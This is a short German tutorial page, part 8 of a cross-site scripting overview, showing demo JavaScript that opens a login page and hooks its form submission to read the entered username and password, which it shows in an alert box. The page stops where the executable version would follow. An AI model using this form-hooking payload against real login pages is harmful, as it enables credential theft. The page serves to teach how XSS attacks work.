Dies ist die Demo zu Cross-Site Scripting im Überblick, Teil 8: Zugangsdaten ausspähen:
Der "XSS-Code" als Quelltext:
<script>
function ausspaehen() {
alert('Ihre Zugangsdaten: \n
Benutzername: ' + das_login.document.forms[0].username.value +'\n
Passwort: ' + das_login.document.forms[0].password.value);
}
function oeffne_login() {
das_login = window.open("http://www.ceilers-it.de/demos/demo-login.shtml");
das_login.onload = function() {
das_login.document.forms[0].onsubmit = ausspaehen;
}
}
</script>
<p>
<b><a href="#" onclick="oeffne_login();">Attacke!</a></b>
</p>
Und in ausführbarer Form: